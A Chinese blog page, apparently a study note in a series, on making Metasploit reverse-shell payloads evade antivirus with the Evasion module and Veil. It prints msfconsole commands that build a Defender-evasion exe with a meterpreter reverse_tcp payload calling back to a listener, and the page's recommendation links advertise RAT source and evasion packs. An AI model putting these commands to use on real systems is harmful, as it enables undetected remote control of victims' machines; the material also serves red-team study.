TideSec远控免杀学习二(Evasion模块+veil)

最新推荐文章于 2024-06-03 10:50:48 发布
最新推荐文章于 2024-06-03 10:50:48 发布
阅读量1.3k 收藏 4
点赞数 1
分类专栏: 免杀
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/fallfeather/article/details/104252338
版权
本文介绍了TideSec的Evasion模块,包括生成exe、hta和install_util的免杀技术及其查杀率,并详细讲解了Veil-Evasion的安装、Docker使用以及如何生成免杀exe。通过实验,Veil-Evasion展现出较好的免杀效果,但某些情况下可能被360等杀软拦截,且生成的exe文件体积较大。Veil-Evasion的潜力在于其shellcode的编译打包能力和与Metasploit的兼容性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Evasion模块

参考链接:

applocker_evasion_install_util.md:

https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/evasion/windows/applocker_evasion_install_util.md

基于白名单Csc.exe执行payloadhttps://micro8.gitbook.io/micro8/contents-1/71-80/77-ji-yu-bai-ming-dan-csc.exe-zhi-hang-payload-di-qi-ji

使用veil绕过杀软:https://blog.youkuaiyun.com/wyf12138/article/details/79825833

免杀后门之MSF&Veil-Evasion的完美结合http://www.secist.com/archives/1107.html

APT级的全面免杀:https://xz.aliyun.com/t/4191

 

生成exe(VT查杀率42/71)

show evasion
use windows/windows_defender_exe
set filename test.exe
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.42.138
set LPORT 3333
run
handler -H 192.168.42.138 -P 3333 -p windows/meterpreter/reverse_tcp
jobs

virustotal.com中42/71个报毒

火绒以及360都会拦

最低0.47元/天 解锁文章
TideSec学习三(Venom+Shellter)
fa1lr4in的小博客
02-11 1506
参考链接: 利用meterpreter下的Venom后门:https://www.cnblogs.com/wh4am1/p/7469625.html 后门venom :https://www.ggsec.cn/venom.html msf及后渗透技术:https://bbs.ichunqiu.com/thread-49618-1-1.html Venom Venom和Veil...
TideSec学习四(BackDoor-Factory+Avet+TheFatRat)
fa1lr4in的小博客
02-12 3455
BackDoor-Factory 介绍 BackDoor-factory,又称后门工厂(BDF),BDF是也是一款老牌的神器,其作者曾经在2015年的blackhat大会上介绍过该工具。但是作者已经于2017年停止更新,效果就算现在来看也还算不错的。 原理:可执行进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来...
01-13
最新,过360.瑞星,等等。
2401_84466359的博客
06-03 1161
随着近两年hvv和红蓝对抗以及国家对于网络安全的重视,国内防护水平都蹭蹭上了一个台阶,不管是内部人员的技术水平提高还是防护设备的层层部署,均给了红队人员想要进一步行动设置了障碍。通过weblogic的cve-2019-2725获取了一个,想要进一步把shell迁移到msf或者CS进行横向移动,那么此时普通的马绝对会被某60秒的,毕竟十来年的规则库积累,可能连上传都上传不了。所以此时的重要性不言而喻。
ghost3.75_2020__ghost制__Ghost_
09-29
已经编译好,包,要的自行下载,谢谢
ghost
07-29
ghost
好用的
qq_65101934的博客
12-09 1387
能测试的,私 联系。
源码,最新教程+源码
10-21
"源码"指的是设计用于避开安全检测的制软件的源代码。 在网络安全领域,""(Anti-Virus Evasion)是指让恶意软件能够绕过反病毒软件检测的技术。通常,技术包括混淆、加密、动态加载、多态性...
全套教程+工具合集
最新发布
08-25
专题(4)-Evasion模块(VT率12-71).pdf 专题(5)-Veil(VT率23-71).pdf 专题(6)-Venom(VT率11-71).pdf 专题(7)-Shellter(VT率7-69).pdf 元专题...
软件GHOST源码
热门推荐
testalllife的专栏
10-19 1万+
软件gh0st源码软件gh0st3.6开源了,开源意味着我们可以在此基础上进行次开发,同时也意味着软可以较容易的查该款木马,既然要利用,我们就做好源码基础上的木马工作。 好久没有来博客了,我把这部分整理了一下,先抛一砖头,有兴趣的朋友可以接着做,也可以和本人交流。 序 gh0st软件采用驱动级RESSDT过主
BypassAntiVirus.zip
03-31
BypassAntiVirus.zip
数字签名添加器.
05-26
用来干什么的 不用说了 用来 大家知道 刚刚珍藏上传 只为资源分 我要一分就好. 要下个东西 ! 谢谢!
网络人软件
12-13
软件,此软件分服务端和客户端,相连可以
Veil-Evasion.7z
12-19
对已封装好的payload进行编码,可以很好的绕过防病毒软件的检测,大神必备神器!导入即可!
从入门到实践(3)-代码篇-C/C++
weixin_46236101的博客
03-13 2276
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《从入门到实践》系列文章目录: 1、从入门到实践 (1)基础篇 2、从入门到实践 (2)工具总结篇 3、从入门到实践 (3)代码篇-C/C++ 4、从入门到实践 (4)代码篇-C# 5、从入门到实践 (5)代码篇-Python 6、从入门到实践 (6)代码篇-Powershell 7、从入门到实.
从入门到实践(6)-代码篇-Powershell
weixin_46236101的博客
03-13 1177
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《从入门到实践》系列文章目录: 1、从入门到实践 (1)基础篇 2、从入门到实践 (2)工具总结篇 3、从入门到实践 (3)代码篇-C/C++ 4、从入门到实践 (4)代码篇-C# 5、从入门到实践 (5)代码篇-Python 6、从入门到实践 (6)代码篇-Powershell 7、从入门到实.
专题(11)-Avoidz(VT率23/71)
Ms08067安全实验室
03-23 895
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!本专题文章导航1、...
专题(5)-Veil(VT率23/71)
gclome的博客
03-17 873
能力一览表 几点说明: 1、下表中标识 √ 说明相应毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒毒情况指的是静态+动态查。360毒版本5.0.0.8160(2019.12.1...
专题(16)-Unicorn(VT率29/56)
Ms08067安全实验室
04-20 1146
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!本专题文章导航1.专题(1)-基础篇:https:/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值